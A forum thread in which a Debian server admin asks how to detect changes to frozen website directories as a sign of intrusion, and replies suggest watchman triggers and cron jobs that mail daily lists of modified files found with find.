I have a server with two handful of sites that are “frozen” and will not change during the next years. I am looking for a solution to monitor all directories under /home/$username/public_html/ for changes. Changes are not expected to happen, so each change could be a sign of a possible intrusion.
I can imagine several solutions for this. One would be a daily cronjob that creates a hash of the files or folders and compares it to yesterday’s hash. If there is a change, it sends an eMail to report that.
Or would inotifywait be able to do the task?
The thing is: I could try to create something like that. But I am far from being a bash monster. And I could imagine that there is already something like that in existence, so that I do not have to invent the wheel a second time.
Are you aware of anything that could achieve the targeted goal?
It’s for a Debian server, so any solution that might work for a Windows server will probably not work for me…
Thanks a lot in advance!
watchman by Facebook is very good for this purpose, if I remember correctly it used
inotify for Linux. It is production grade and comes with prebuilt features such as running a script when file change and logging the changes etc.
# Add a new folder to watchman
watchman watch ./
# Remove a watched folder from watchman
watchman watch-del ./
# List all watched folders
# Add a trigger to watched folder
watchman -- trigger ./ triggername -- ./trigger.sh
# Remove a trigger from watched folder
watchman trigger-del ./ triggername
# List all triggers
watchman trigger-list ./
The command assume you are watching current working directory and contains a script named as
trigger.sh. The first parameter / argument passed in to your script will contains the changed file name, which can be accessed using
$1 in bash script.
The documentation for
watchman is quite bad, will update this post if I make a mistake. For advanced usages please take a look here: Installation | Watchman
I used to use a simple cron one liner for something like that:
1 1 * * * root find /home/$username/public_html/ -mtime 0 | mail -s yoursubjecthere email@example.com
this is a very basic approach and sends you a daily mail that’s empty, unless there are files that changed, which then will be in it as a list…
probably easy to extend it a bit to only invoke mail if there are results, but I was too lazy
PS: if it’s not a million files you probably could run find twice
1 1 * * * root [[ -z `find /home/$username/public_html/ -mtime 0 -print -quit` ]] || find /home/$username/public_html/ -mtime 0 | mail -s yoursubjecthere firstname.lastname@example.org
haven’t tested that proeperly though…
Not really neat but something I can think of is like
dirc=$(find Desktop -name *litespeed*); echo $dirc | if [ $(wc -c) -ne 0 ]; then mail -s yoursubjecthere << $dirc; fi
Though would prefer using slack webhook or something to make sure it actually reaches.
Excellent! Thank you so much, guys! Those are great starting points for me and will help a lot!